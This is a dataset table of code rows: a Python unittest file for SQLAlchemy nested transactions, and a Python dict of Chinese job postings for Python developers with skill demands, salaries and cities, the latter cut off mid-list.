text string | size int64 | token_count int64 |
|---|---|---|
import sys, os.path
sys.path.append(os.path.dirname(os.path.dirname(__file__)))
# from brett_sqlalchemy import *
# A relative import cannot be performed when the parent package is not loaded, so the system import path is adjusted instead.
from main import *
import unittest
from sqlalchemy.ext.declarative import declarative_base
import os
import json
Base = declarative_base()
sql_config_path = os.path.join(os.path.dirname(os.path.dirname(__file__)), 'db_config.json')
with open(sql_config_path, 'r') as sql_config_file:
    sql_config = json.load(sql_config_file)
connection_string = sql_config['server'] + '://' + sql_config['user'] + ':' + sql_config['password'] + '@' + sql_config['address'] + '/' + sql_config['database'] + sql_config['extra']
mode = sql_config['mode']
echo = False
# if mode in ('develop', 'debug'):
# echo = True
provider = ConnectionProvider(connection_string, echo=echo)
configure_provider(provider)
provider.start()
engine = provider._engine
class ModelA(Base, TimeStampMixin, SoftDeleteMixin):
__tablename__ = 'test_model_a'
id = Column(Integer, primary_key=True, autoincrement=True)
name = Column(String(50))
class ModelB(Base, TimeStampMixin, SoftDeleteMixin):
__tablename__ = 'test_model_b'
id = Column(Integer, primary_key=True, autoincrement=True)
name = Column(String(50), unique=True)
metadata = Base.metadata
metadata.create_all(engine)
class TestSession(unittest.TestCase):
# @classmethod
# def setupClass(cls):
# metadata = Base.metadata
# metadata.create_all(engine)
#
# def test_normal_session(self):
#
# @db()
# def add_one(name, session):
# instance_a = ModelA(name=name)
# session.add(instance_a)
#
# @db()
# def query_one(name, session):
# instance_a = session.query(ModelA).filter_by(name=name).first()
# if hasattr(instance_a, 'name'):
# return instance_a.name
# return None
#
#
# add_one('Eureka')
# name = query_one('Eureka')
# self.assertEqual(name, 'Eureka')
def test_nest_transaction_(self):
@db
def insert_multi_success(session, outer):
insert_one('Spring', outer=outer)
insert_one('Summer', outer=outer)
insert_one('Autumn', outer=outer)
@db
def insert_multi_fail(session, outer):
insert_one('Winter', outer=outer)
insert_one('Winter', outer=outer)
insert_one('Peace', outer=outer)
@db
def insert_one(name, session, outer):
instance_a = ModelB(name=name)
session.add(instance_a)
@db
def query_one(name, session, outer):
instance_a = session.query(ModelB).filter_by(name=name).first()
if hasattr(instance_a, 'name'):
return instance_a.name
return None
insert_multi_success()
spring = query_one('Spring')
summer = query_one('Summer')
autumn = query_one('Autumn')
self.assertEqual(spring, 'Spring')
self.assertEqual(summer, 'Summer')
self.assertEqual(autumn, 'Autumn')
insert_multi_fail()
winter = query_one('Winter')
self.assertFalse(winter)
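# Standard unittest entry point so this test module can also be run directly.
if __name__ == '__main__':
    unittest.main()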
| 3,284 | 1,044 |
# Organize the skill requirements for each career stage
"""
Broad categories:
Python (language):
Databases:
Servers:
Other:
(a keyword-based categorization sketch follows the data below)
"""
fourth_chart = {'first': [
{'demands': ['精通Python语言',
'熟悉Python多进程应用开发',
'熟练掌握至少一门PythonWeb开发框架(Tornado、Django、Flask等)',
'熟练使用mysql,redis,mongodb',
'熟悉Linux、分布式、微服务、高性能Web服务开发、有一定的系统架构设计能力者优先',
'拥有良好的代码习惯,结构清晰,命名规范,逻辑性强',
],
'salary': '10-12K',
'site': '北京'},
{'demands': ['精通python/shell编程,有良好的编程习惯,能够实现高效、可靠的代码',
'负责服务端业务开发',
'对软件工程深入理解,熟悉面向对象的分析和设计技术,熟悉linux平台',
'有搜索引擎开发能力有限',
'此岗位为外派到360的岗位项目稳定',
'数据蜘蛛系统开发',
'有政府项目开发背景',
'具有良好的沟通能力和独立解决问题的能力,有积极进取的创新精神',
'具有搜索相关/大并发/高性能系统开发经验,或具有深厚的算法基础理论知识者优先'],
'salary': '10-14K',
'site': '北京'},
{'demands': [
'具有机器/深度学习框架的开发经验,如sklearn、xgboost、TensorFlow、PyTorch等',
'了解图像领域的常⻅任务及其发展脉络'
'赋能客户使用OCRSDK完成自动建模和模型上线',
'负责区域内OCR项目支持工作,包括POC项目、交付项目',
'负责带领客户进行建模方案设计、项目实施、并进行项目管理,确保达成项目目标',
'了解常⽤的图像处理技术,掌握opencv、pillow等图像处理库',
'积极主动,能够在有限资源下追求最好的结果',
'具有一年以上python开发及测试经验,熟练掌握numpy等常用python库',
'熟悉linux开发环境,会使用常见的shell命令',
'熟悉CLI,docker,git工具链',
'了解C/S架构,了解restfulapi规范,http协议',
'计算机或相关专业,了解常用数据结构和算法',
'在GitHub上有1k+star的开源项目',
],
'salary': '8-10K',
'site': '北京'},
{'demands': [
'编写自动化测试用例',
'熟悉pep8规范,有良好的编程风格',
'至少一年及以上Python开发经验,有良好的编程能力',
'熟练使用SQL,熟悉PostgreSQL、MySQL等数据库',
'参与产品需求分析和评审',
'负责模型设计、详细设计和接口设计与评审',
'编码实现功能需求,修复Bug缺陷和代码评审'
],
'salary': '9-14K',
'site': '上海'},
{'demands': ['练操作Linux系统(熟练使用Linux命令)',
'熟练使用VNC等远程访问工具(最好能对芯片电路板有一定了解)',
'熟练使用Python,BAT等脚本语言',
'熟练使用JIAR和HSD等Bug管理工具'],
'salary': '8-12K·13薪',
'site': '上海'},
{'demands': ['从事搜狗客户端产品的统计管理系统的设计和开发',
'熟练掌握python脚本语言,使用过Django前端框架',
'熟练使用HTML/CSS/Javascript/jquery/bootstrap等前端技术,代码符合W3C标准、兼容主流浏览器',
'参与现有产品的设计和讨论',
'熟悉Linux环境,熟悉SQL语句'],
'salary': '4-7K',
'site': '北京'},
{'demands': [
'良好的交流表达能力,能够配合客户部同事梳理解决疑难问题.',
'有较好的协作能力和团队精神',
'熟练使用shell或者Python进行服务器的维护,和自动化脚本的开发,有系统架构设计者优先.',
'精通熟练python开发,使用过Django,Redis,Mysql,3年以上经历',
'业界领先,全额社保,年终奖,六险一金',
'专科及以上学历,软件工程相关专业,数据结构等基础扎实,有编码洁癖,很好的面向对象思维.',
'负责公司socialCRM产品的开发'
],
'salary': '10-15K·13薪',
'site': '北京'},
{'demands': [
'熟练掌握python编程熟悉python相关web框架,如Django,Flask等',
'硕士及以上,计算机',
'编写并执行测试用例,准确跟踪模块的缺陷或问题',
'熟悉Linux系统操作,可独立完成小型python项目的开发',
'熟练运用测试方法及工具对模块及接口性能进行测试,准确发现性能短板',
'熟练使用python性能测试工具与http接口测试工具,如lineprofiler,apachebench等',
'加分项:具有python项目开发经验,或具有python自动化测试经验者优先',
'支持项目python方面的相关开发工作'
],
'salary': '2-4K',
'site': '北京'},
{'demands': [
'工作积极主动,认真细致,有独立思考意识',
'熟悉网络安全产品优先考虑',
'熟悉linux开发环境,熟悉常用shell命令',
'扎实的python基础,熟悉python常用库的使用至少连续一年python开发经验有良好的编码习惯',
'熟悉django开发框架,了解restapi设计模式',
'python开发实习生,应届毕业生,初级开发工程师',
'熟悉mysql数据库使用,熟悉至少一种缓存数据库使用',
'良好的沟通能力,能与团队成员有效沟通'
],
'salary': '9-12K',
'site': '北京'},
{'demands': [
'有2年以上Python开发经验,能独立完成需求',
'熟练掌握Python语言,熟悉python数据分析类库,有numpy',
'熟悉python的RestfulAPI常用框架,及Pythonweb框架如:Django',
'拥有良好的代码编写风格,要求结构清晰,命名规范,逻辑性强,了解技术文档编写规范具有良好的学习能力',
'熟悉Linux系统,熟悉常用爬虫框架,如Scrapy,webmagic等',
'熟悉数据库mysql'
],
'salary': '10-15K',
'site': '北京'},
{'demands': [
'负责分布式的网络爬虫应用,实现大规模文本,进行多平台信息的抓取和分析',
'图像数据的抓取、抽取,去重、分类、垃圾过滤、解析入库等工作',
'负责基于电商风控引擎大数据平台批量自动生成数据分析报告',
'支持数据分析'
],
'salary': '8-13K',
'site': '西安'}],
'second': [
{'demands': ['4熟悉mysql等关系数据库的使用',
'1参与公司产品后台服务的设计、开发、优化等研发工作,保证产品的质量和开发进度',
'1-3年以上python开发经验或其他语言经验丰富,基础扎实,有意转python开发者亦可',
'研究新兴技术,对产品进行持续优化',
'熟悉pythonweb框架,django、tornado、flask等任意一种',
'熟悉linux,git的使用'],
'salary': '15-25K',
'site': '北京'},
{'demands': ['3年以上python开发经验',
'熟悉Linux指令,git管理',
'熟悉mySQL',
'python多线程,多进程,会flask框架',
'有大数据和机器学习工作经验的优先考虑',
'华为大数据项目,AI领域,非外派,软通总部办公'],
'salary': '12-20K',
'site': '北京'},
{'demands': ['参与公司相关产品的架构优化,性能优化及其模块的技术实现',
'计算机相关专业毕业3年以上Python开发经验',
'负责所属模块的前后端开发',
'良好的代码风格和开发习惯',
'熟悉常见的存储方案,包括MySQL',
'性格积极乐观,诚信,较好的沟通能力,文档整理能力',
'良好的问题理解能力,能够理解以及处理复杂逻辑',
'具备强烈的进取心',
'熟悉常见的Web框架,包括Django,Tornado,Flask等',
'负责公司智能管理信息化系统模块的功能规划',
'熟悉主流前端框架,了解React',
'具备OA系统'],
'salary': '20-40K·16薪',
'site': '上海'},
{'demands': ['精通异步网络编程,多线程编程,HTTP协议,异步框架Async,集群与负载均衡,消息中间件等技术',
'5年以上Python开发经验',
'根据产品需求,进行系统设计和编码,持续对系统架构进行改造和优化',
'熟练使用Linux操作系统,具有基础服务维护能力',
'理解并能应用RESTFul规范,具备较强的编程能力和良好的编码风格、结构清晰,命名规范,逻辑性强,代码冗余率低',
'根据需求制定技术方案,项目计划以及开发,学习研究,并将之应用到工作当中',
'熟练使用Mysql,Redis、PostgreSQL等',
'负责公司OCR模块接口的功能开发和代码维护,能独立完成子系统和功能模块开发,编写完整的接口文档',
'熟悉常用Web服务器软件如ApacheNginx等',
'熟悉Python编程语言,熟悉flaskdjangotornado其中至少一种Web开发框',
'熟悉网页抓取原理及技术,能够总结分析不同网站,网页的结构特点及规律'],
'salary': '20-25K·13薪',
'site': '上海'},
{'demands': ['熟悉Mysql的使用,优化,及常用的非关系型数据库',
'有运维,部署相关操作经验',
'参与公司项目的设计和开发',
'熟练使用Python进行开发,至少熟悉一种后端框架,Django或者Flask,有Django项目开发者优先',
'参与服务端性能的调优和迭代',
'熟练使用异步,消息队列',
'有docker使用经验',
'了解前端技术',
'了解Linux环境开发,熟练使用常用命令'],
'salary': '15-25K·13薪',
'site': '上海'},
{'demands': ['熟悉Linux系统和网络知识,扎实的基本功,熟悉设计模式',
'熟悉Python者优先,包括但不限于:sklearn,多线程,matplotlib等',
'了解或希望从事深度学习、机器学习方向相关工作者优先',
'有良好的问题解决能力,难题公关经验,能主动推动项目的进展并达成项目目标'],
'salary': '11-16K·13薪',
'site': '北京'},
{'demands': ['熟悉操作系统和网络知识',
'熟悉Docker,Kubernetes等容器技术',
'熟练掌握Python开发',
'负责开源堡垒机Jumpserver(https://github.com/jumpserver/jumpserver/)的开发工作',
'了解angular,阅读过开源代码,活跃于开源社区者优先',
'熟悉LinuxShell编程',
'有良好的数据结构和算法基础',
'有丰富的Django开发经验',
'熟悉jQuery'],
'salary': '20-30K',
'site': '北京'},
{'demands': ['(3)熟悉Linux平台,熟悉Linux操作系统运维和Linux系统管理,维护,使用',
'(1)熟悉python语言',
'(2)5年以上的软件开发经验',
'熟练掌握python',
'有大型互联网IT系统的项目开发',
'主要技术要点:python、mysql数据库、docker、git、云平台网络',
'熟练掌握微服务架构,熟悉容器编程',
'熟悉云平台网络技术,包括物理网络(交换机',
'(4)熟悉数据库表结构设计和使用,有分布式系统及异步任务系统开发经验者优先',
'岗位要求说明',
'有软件工程意识,熟悉面向对象编程的思想',
'(5)在弹性计算、存储、数据库、网络、中间件、安全、操作系统、虚拟化、基础设施(数据中心/网络/服务器)等任一领域有一定理解'],
'salary': '12-19K',
'site': '北京'},
{'demands': ['熟悉Linux、Git、Markdown等常用开发环境及协作形式,熟悉项目文档管理,有相关项目经验者优先',
'熟练使用Mysql/PostgreSQL,熟悉Nosql数据库如Redis等,有hadoop经验更佳',
'有独立分析和解决问题的能力,有良好的团队合作精神和沟通能力',
'编写简洁、高效、清晰和可测试的代码,并通过单元测试、集成测试和CodeReview等保障代码质量',
'熟练掌握Flask、Django等Web框架,熟悉SQLAlchemy等ORM框架,及Pandas等数据处理框架',
'-岗位职责:',
'-任职要求:',
'参与后台服务的设计、开发、优化、维护等研发工作'],
'salary': '15-25K',
'site': '北京'},
{'demands': ['精通分布式文件存储系统原理,有分布式存储系统运维开发经验优先,有seafile产品运维开发经验更佳',
'熟悉Linux操作系统',
'熟悉java开发更佳,有实际生产部署经验更佳',
'负责研发运维工具,提升运维效率',
'熟悉Python语言',
'了解c\\\\c++语言,能够读懂代码更佳,熟练掌握vuereacthtmlcssjs更佳',
'熟悉分布式文件存储系统原理有企业网盘运维经验',
'帮助部署代码,承担一定的python代码开发',
'负责大文件&文件云平台(企业网盘)的运维,保证高可用',
'有一定的源码阅读经验,能够快速学习心的技术,能够阅读英文文档'],
'salary': '15-25K',
'site': '上海'},
{'demands': ['熟悉MySQL等关系型数据库,熟悉SQL语言',
'有基本的计算机基础理论知识,熟悉常用数据机构与算法',
'能够熟练使用Linux作为日常开发环境',
'思路清晰、主动性强,有缜密的逻辑思维能力,快速的英文阅读能力及学习能力,良好的沟通能力',
'对TCP/IP,HTTP等常用协议有基本的了解,能完整叙述一次HTTP请求从客户端到服务器端所经过的各个环节',
'根据项目组需求,对已有的网站增加新的功能,bugfix等',
'熟悉ES6,有Vue',
'能熟练使用Python进行Web程序相关开发,掌握Django等相关框架'],
'salary': '13-15K',
'site': '上海'},
{'demands': ['熟练掌握Python后端开发,掌握unitest测试框架,有测试代码开发经验优先;',
'熟练掌握数据结构',
'负责Python自动化开发',
'负责指导业务团队自动化脚本开发,涉及UI界面类自动化',
'熟悉Linux操作系统,TCPIP协议',
'构建自动化脚本开发支撑库,提升自动化脚本开发效率'],
'salary': '12-23K',
'site': '上海'},
{'demands': ['负责后台系统的开发',
'精通Python,掌握Django框架,熟悉djangorestframework',
'优化HDFS,Impala,Hive的读写性能',
'熟悉MySQL或Oracle数据库',
'要求有海量数据处理经验',
'对历史数据进行清洗,转换',
'有其他Web后台使用经验或其他语言如Go,Java优先',
'优化系统在海量数据下运行速度',
'熟悉Hadoop生态,掌握HDFS、Hive、Impala使用方式优先'],
'salary': '20-40K',
'site': '上海'},
{'demands': ['负责运营后台的网站前后端维护及功能实现',
'协助负责游戏服务端功能实现,性能优化等',
'熟悉django,html,css',
'熟悉多种数据库技术,包括MySQL,Redis,MongoDB等',
'熟悉python及相关的库,熟悉linux环境',
'具备服务器性能及代码性能优化能力,具备高并发流量下的请求处理经验',
'保证服务端的稳定性',
'相关的工具开发,相关文档的书写'],
'salary': '12-24K·13薪',
'site': '北京'},
{'demands': ['熟悉NoSQL技术,如Redis/MongoDB等,有Mongokit/MongoEngine使用经验尤佳',
'熟悉TypeScript/Rust/Go等',
'有自己的开源Python开发项目',
'负责业务规则引擎和ApiEngine的研发',
'主要工作内容:',
'负责同城智能协作配送SaaS产品PaaS系统开发和维护工作',
'二年以上Python完整项目开发经验',
'负责基于k8s的基础服务系统开发',
'有激情爱学习愿意提升,愿意以创业心态做事',
'Flask/Django/Tornado/Gevent/Nsq/ZeroRPC/ZeroMQ以上技术至少有2项以上的开发应用经验',
'展示自己的Github项目',
'趣钱包等金融产品的研发'],
'salary': '11-20K',
'site': '北京'},
{'demands': ['熟练掌握Python,Django/Tonado,MySQL/PostgreSQL,Redis等组件',
'独立思考,有产品意识,能提出系统改善和产品优化者优先',
'深入了解TCP/UDP协议,进程间通讯编程,熟悉各类服务器架构并能合理的应用',
'负责在线大流量高并发系统设计和性能调优',
'3年以上开发项目经验,至少3年的Python开发经验,有异步编程开发经验',
'【岗位职责】',
'了解前端相关技术,VUE',
'负责高质量的设计和编码工作,承担重点',
'负责系统的技术方案',
'【任职要求】',
'熟悉大数据相关工具ES者优先',
'具有良好的数据结构和算法基础,具备扎实的编程能力',
'负责体育比分产品后台系统和接口的研发,形成规范化的软件代码和单元测试文档',
'根据产品规划,制定后台系统的开发'],
'salary': '20-25K·14薪',
'site': '北京'},
{'demands': ['熟悉一种或多种数据库者优先,如Oracle',
'有一年及以上Python开发经验',
'有linux操作系统'],
'salary': '12-24K',
'site': '北京'},
{'demands': ['设计和开发基于KVM虚拟机的高可用(HA)功能,保证用户业务的连续性',
'设计和开发大规模集群的异步任务调度中心,提供高并发且稳定的调度功能',
'撰写细致的设计文档,并对其他同事的代码进行审查',
'具有2年或以上软件开发工作经验',
'具有Web后台开发经验',
'计算引擎研发工程师',
'设计和开发基于KVM、VMware、Docker/Kubernetes等虚拟化和容器化技术的统一管理平台',
'有Kubernetes的开发经验或代码贡献者',
'有大规模集群系统的开发经验,对软件高可用,高并发有深刻的理解',
'具有基于以下至少一种软件开发的经验,包括MySQL、MongoDB、Redis、Cassandra、ElasticSearch、ZooKeeper等',
'代码风格干净简洁,具有极高的软件质量标准',
'热爱编程,具有以下任一种语言的扎实的编程经验:Python、Golang、Java',
'有基于KVM、Qemu、Libvirt、Openstack等项目开发的经验',
'与测试、产品、售前和售后部门密切配合,不断提升产品质量和竞争力',
'具有独立完成复杂功能的经历,能够完成完备的设计文档,清晰的接口定义,能够有效的进行任务拆分',
'设计和实现健壮、清晰的RESTfulAPI',
'熟悉Linux环境编程,理解I/O模型、事件模型、协程、线程池等基本概念,具有异步网络编程经验'],
'salary': '15-30K·14薪',
'site': '北京'},
{'demands': ['负责公司产品的功能开发',
'能够按照规范化流程进行项目实施,能够做好项目代码质量的管控',
'熟悉Flask',
'熟练掌握Python开发语言',
'配合完成编制项目实施计划,协调资源并按计划推进项目实施工作,按时按质交付',
'熟悉主流Windows/Linux攻防技巧者优先',
'熟悉信息安全产品,有信息安全行业工作经验者优先',
'乐于分享,积极参加技术讨论交流会,活跃团队内技术氛围'],
'salary': '15-20K',
'site': '北京'},
{'demands': ['有大数据和机器学习工作经验的优先考虑',
'熟悉mySQL,redis,elasticsearch,http,websocket,webhook',
'熟悉Linux指令,git管理',
'python多线程,多进程,flask框架'],
'salary': '12-20K',
'site': '北京'},
{'demands': ['参与相关业务',
'熟练使用Redis',
'jinjasqlalchemy熟练使用',
'负责产品后端设计',
'Mysql熟练使用并且有大数量处理经验',
'有优秀的解决问题的能力,有很强的学习能力',
'2年以上Python开发经验,具有实际项目开发经验,承担过核心开发任务',
'根据产品需求和技术演进,制定技术方案,项目计划,并制定相应方案执行'],
'salary': '15-25K',
'site': '北京'},
{'demands': ['负责分析业务领域比较复杂的问题,根据业务需求选择技术解决方案',
'对系统及平台进行完善维护,包括功能改进、系统优化及技术支持等',
'熟悉SOA架构,具备HTTP,TCP等网络服务端开发经验',
'编写符合规范的功能结构定义、需求说明、开发设计等技术文档',
'有成为全栈的潜力和强大的自我学习能力希望成为进可攻前,退可守线的全栈大牛',
'能够独立完成业务设计和相关技术实现,分析并解决开发过程中的问题',
'熟悉Nginx、Apache、Tomcat、HAproxy等',
'熟悉Docker容器技术和OpenStack架构者优先',
'精通Python语言,两年及以上Python开发经验,能解决实际开发中遇到的问题',
'精通Django、Tornado、Flask等主流开发框架(之一)',
'熟练操作Linux,能进行脚本编程和系统维护',
'掌握MySql、MongoDB、Redis等数据库的使用,同时熟悉NoSQL类型数据库者优先',
'思路清晰,具备服务意识和良好的沟通能力、理解能力和团队合作能力',
'有良好的编程习惯,包括好的设计文档,单元测试,代码审查,适应敏捷开发模式',
'参与平台项目的设计与开发工作,包括需求分析、系统设计、编码和单元测试等工作',
'能够独立完成详细设计及编码、进行代码审查'],
'salary': '15-25K',
'site': '上海'},
{'demands': ['具备网络安全产品研发经验',
'熟悉kvm和Docker容器技术,了解kvm和Docker技术框架,熟练使用kvm和Docker命令',
'熟悉常用的数据库和缓存组件,包括但不限于Mysql、Redis、Mongo等',
'需熟悉各类Linux操作系统,具备独立数据库设计并且调优的能力',
'熟练使用Python常用框架Django、Tornado、Flask,熟悉RestfulAPI',
'其他研发负责人安排的任务',
'精通Python开发,并具有3年以上Python开发经验',
'熟悉unix/linux环境开发,熟悉使用常用的shell命令',
'产品研发及研发任务完成'],
'salary': '15-30K·14薪',
'site': '北京'},
{'demands': ['精通Python语言,代码风格良好,3年以上python开发经验;',
'熟悉面向对象的软件设计及设计模式;',
'熟悉Git工作流,可以和团队协同工作熟悉Linux下开发',
'有openstack开发经验优先',
'扎实的计算机基础,熟练掌握数据结构、算法、计算机网络、操作系统等基础知识',
'精通数据模型的设计优化及常用DB的调优;',
'精通常见的PythonWeb框架,包括但不限于Django'],
'salary': '13-25K',
'site': '北京'},
{'demands': ['负责服务、API开发',
'负责Python后端服务开发,解决业务逻辑和数据产品相关业务',
'熟悉NoSQL技术,如Redis/MongoDB等,能够独立地合理设计数据库结构,有Mongokit/MongoEngine使用经验尤佳;',
'有独立开发项目,上线维护及架构能力',
'业务规则引擎和ApiEngine的研发',
'熟悉Pandas,对大数据数理统计建模有相关经验者优先',
'有较强的数据建模能力,逻辑思维能力以及业务理解能力;',
'有自己的开源Python开发项目',
'参加业务线上运维,故障应急处理',
'精通Linux操作系统、熟悉掌握Linux下常用命令,有Shell编程能力;',
'展示自己的Github项目'],
'salary': '15-24K',
'site': '北京'},
{'demands': ['熟悉python语言,有2年使用经验,熟悉常用的web框架如flask',
'熟练使用Linux命令',
'熟练使用git等代码管理工具',
'可适应出差',
'基于Python开发WebService,包括设计、代码编写、单元测试、bug解决等',
'熟悉c/c++编程优先',
'有OCR、人脸识别开发经验优先',
'熟悉HTML,CSS,Javascript等前端开发'],
'salary': '13-18K·13薪',
'site': '北京'},
{'demands': ['熟练掌握Django开发框架,熟悉其他Python开发框架者优先',
'配合其他研发人员完成模块研发',
'根据解决方案进行指定模块研发,并对其进行优化及维护',
'3年以上Python开发工作经验,具有良好的编程风格,具备后端性能最优化和安全最大化的知识及能力,具有大型网站项目开发经验者优先',
'优化现有产品的功能和体验细节',
'【岗位职责】',
'负责公司数据产品设计和代码实现',
'计算机相关专业,专科以上国家正规院校毕业',
'熟悉数据库,精通SQL和数据结构,具有MySQL等关系型数据库开发经验,有其他数据库PostgreSQL/MongoDB工作经验者优先',
'熟悉Linux/Unix基本操作,能够编写shell脚本'],
'salary': '15-30K',
'site': '上海'},
{'demands': ['与后端开发人员合作,完成公司B端前端业务系统的研发',
'配合项目经理完成相关任务目标',
'计算机及相关专业,5年以上python开发经验,有完整项目开发经验或企业级产品开发经验优先,熟悉开发工作流程',
'丰富的PyQt开发GUI经验',
'有Python调用后端RestfulAPI的项目经验',
'有Python读写USB串口的项目经验;',
'有Python绘制动态曲线的经验,熟练使用matplotlib或其他类库绘制动态曲线',
'负责相关技术实现文档的撰写',
'与项目组的其他成员合作,能承受短期交付的压力',
'分析并解决软件开发过程中的问题'],
'salary': '15-25K',
'site': '北京'},
{'demands': ['熟练掌握数据结构及算法',
'有实际工程落地以及部署经验者优先',
'收集整理客户反馈意见、产品实施过程问题,汇总成文档并进行问题追踪处理',
'熟练掌握Python开发(必须)',
'对客户进行产品使用培训、指导、问题解答和技术支持',
'为客户快速接入OCR产品和服务,包括实施开发、数据对接、调试(需要会写Python)',
'参与测试流程,并对产品提出问题与看法'],
'salary': '15-25K·14薪',
'site': '上海'},
{'demands': ['熟悉Web开发相关技术栈,Web框架',
'本岗位负责公司AI平台的研发,通过提升AI平台的能力,提高公司AI解决方案的交付能力',
'熟练掌握Python编程语言,及Python相关的WEB开发框架,比如Django',
'2年以上的Python开发经验,同时掌握一门静态语言如C/C++/JAVA优先',
'参与公司内部AI相关的创新工具的研发',
'熟悉基本数据结构与常用算法了解机器学习相关算法优先',
'熟悉MySQL,Redis,Mango数据库',
'有Docker',
'了解消息中间件的原理和开发(例如RabbitMQ)',
'有分布式系统开发使用经验者优先',
'对工作热情积极'],
'salary': '15-20K·14薪',
'site': '北京'},
{'demands': ['熟练使用python编程了解Django、tornado、Flask等常用的Web框架开发有一定的Git、VIM使用经验',
'参与技术方案讨论和技术调研',
'负责相关工具开发和相关文档的编写',
'良好的沟通与表达能力、思路清晰,较强的动手能力与逻辑分析能力',
'热爱工作,有良好的学习能力,能够接受新鲜事务,对新技术及新模块可以快速掌握运用',
'负责服务器端后台设计、功能开发及维护',
'负责服务器性能的优化,保证服务端稳定安全的运行',
'熟练使用Linux系统,对算法、数据结构有一定了解',
'产品上线后,保障运营平台的稳定,解决相关技术问题',
'熟练掌握MySQL/Memcached/ElasticSerch等常用存储技术(数据库系统)'],
'salary': '20-40K·14薪',
'site': '北京'},
{'demands': ['五年以上Python开发经验,熟悉Python运行环境、运行原理,有JAVA开发经验优先',
'持续对系统架构进行改造和优化',
'按照要求编写设计文档',
'熟悉敏捷开发,编写高质量的代码,构建可重复使用的代码以及公共库',
'任职要求',
'有自动化运维经验优先,比如CMDB,发布系统,配置中心,调度系统,监控系统,工单系统等',
'能够及时快速处理服务器的各种突发问题',
'职位描述(主要职责)',
'根据产品功能模块设计,编写核心代码,并确保开发质量与进度'],
'salary': '18-29K',
'site': '北京'},
{'demands': ['熟悉python其他扩展模块',
'参与量化平台',
'精通SQL编写,熟练使用至少一种关系型数据库',
'熟练掌握python,掌握numpy',
'精通python语言,有扎实的编码能力,良好的编码习惯和学习能力',
'有解决复杂的反爬限制实践经验',
'完成需求',
'根据产品或项目的要求'],
'salary': '17-26K·13薪',
'site': '上海'},
{'demands': ['岗位要求:熟悉Linux系统使用、配置,具备Shell、Python、Java、C中一种或多种编码能力工作地点:北京/西安',
'Python开发测试工程师'],
'salary': '15-30K',
'site': '北京'},
{'demands': ['可以按照人天或月薪支付费用皆可',
'英文口语流利',
'精通flask框架',
'上海急需1名英文好的Python开发工程师,属于外派性质',
'精通MySQL或者postgreaql,docker,',
'大专及以上学历,至少3年以上Python开发经验'],
'salary': '13-15K',
'site': '上海'},
{'demands': ['参与产品沟通,需求分析,方案设计,程序开发,运营优化,架构设计,做到系统可控',
'2年及以上Python实际项目经验,精通Web开发框架如Flask/Django',
'熟悉Docker,Kubernetes,DevOps,ETL/ELT,ELK等相关技术加分',
'良好的沟通能力加分,优秀的解决问题能力加分,不对个人技术路线设限',
'海量数据大访问量的内存与存储系统',
'精通MySQL或其他关系型数据库,精通Redis/MongoDB熟悉Nginx配置',
'扎实的面向对象编程思想,模块化编程的思维,应用性能优化等方面问题的分析和解决能力',
'负责移动互联网游戏服务器端PythonWebService开发,为全球用户提供可靠服务',
'除Python外,至少还熟悉Perl/Java/C#中的一门编程语言,有实际编写经验'],
'salary': '11-22K',
'site': '北京'},
{'demands': ['分析重点行业客户的信息资料,构建客户资产信息知识图谱',
'熟悉甲方行业客户的软/硬件信息者优先',
'负责收集',
'计算机',
'熟练掌握Python/C/C++语言',
'掌握Elasticsearch/MongoDB数据库的使用',
'熟悉爬虫框架,能够从相关网站提取信息和进行数据分析',
'建设情报分析平台,根据需求输出行业化情报信息'],
'salary': '12-20K',
'site': '北京'},
{'demands': ['熟悉Python的高级特性,具备良好的编码习惯,深入理解各种设计模式和应用场景',
'负责并持续优化算法和AI底层模块封装的研发(类型:图像提取、图像匹配、图像内容分析、图像设计质量等)',
'掌握Django,Tornado,Flask等一种主流框架,深入理解框架实现原理及特性',
'搭建基于WEB内部机器学习训练平台,完成算法效率的提升和基础能力沉淀',
'理解算法与应用之间的封装和整合,负责将模块进行产品化的架构设计、维护和研发',
'熟悉Internet常用协议,如HTTP、TCP/IP、熟悉RESTful规范',
'掌握至少一种关系型数据库,了解Docker运维知识',
'数学功底和建模能力强,熟悉机器学习领域的常见原理以及AI适用场景、优点、缺点以及弥补办法',
'有一定外文文献的阅读能力,对计算机视觉、计算机图形学有极大兴趣者优先'],
'salary': '20-30K·13薪',
'site': '上海'},
{'demands': ['了解C/C++编译、打包、发布流程,或有相关经验',
'代码风格,符合Python官方规范,并且能轻松通过静态代码检查',
'python开发基本要求:',
'了解测试基本概念,熟练使用一种测试框架',
'有分布式编程经验',
'有基于容器的集群管理、部署、运维经验',
'适应能力强,热爱编程,勤奋努力',
'理解Web编程,熟练使用至少一种框架',
'有CI/CD经验',
'理解容器技术,熟练使用DockerCLI,能开发Dockerfile',
'熟练使用异步、并发编程',
'了解Python生态,会打包发布Python软件',
'熟练使用至少一种Linux发行版,能开发简单Shell脚本',
'有开源项目经验',
'理解CLI编程,熟练使用参数解析、日志打印、网络请求等基本操作'],
'salary': '11-21K',
'site': '上海'},
{'demands': ['熟练掌握mysql/redis数据库使用,熟悉linux操作系统及shell编程,熟悉git的使用',
'熟悉微服务开发模式,了解docker\\k8s,具有良好的编码规范意识',
'有熟悉的开发框架,具备服务化开发能力',
'【岗位职责】',
'负责子系统架构、模块化设计、分析,以及核心代码编写,提升软件性能、可靠性、可维护性、可扩展性',
'熟练Python开发',
'承担公有云、私有云、SDN/NFV、IOT等运营、运维系统中相关模块的分析、设计、开发工作'],
'salary': '15-30K·14薪',
'site': '杭州'},
{'demands': ['项目名称:华为大脑大型搜索引擎项目',
'知识图谱数据采集爬虫开发',
'负责DC模块的开发与部署',
'具备较强的安全意识和一定安全风险控制能力',
'保存数据到MongoDB',
'使用coufluent-kafka模块替代kafka-python模块,解决分发时send的处理瓶颈',
'该搜索引擎类似google搜索,通过用户搜索的query解析得到用户可能想要找到的网站、数据及相关信息',
'设计爬虫策略和防屏蔽规则,解决字体干扰',
'熟悉Python语言,能够熟练使用python的web框架设计网站,例如django等',
'提升处理能力到每秒10w条数据,分发效率为每秒1000w条',
'熟悉多线程',
'分析网页结构',
'有较强的逻辑思维能力,对技术有强烈的兴趣,具有良好的学习能力',
'参与通用爬虫系统中爬虫模块的开发与维护',
'熟悉Linux/Unix类开发环境,熟悉其常用命令的使用;熟悉MySQL,Redis,MongoDB',
'采用多线程',
'搜索引擎搜索引擎开发',
'采用多进程的方式提高DC模块的数据处理能力',
'工作主动性强,能承受一定的工作压力',
'负责智能搜索中股票和汇率的后端开发与部署内容',
'有过分布式任务调度管理(celery)的经验,可熟练编写高并发程序',
'团队现有PYTHON工程师50人+后端及爬虫岗位都招聘',
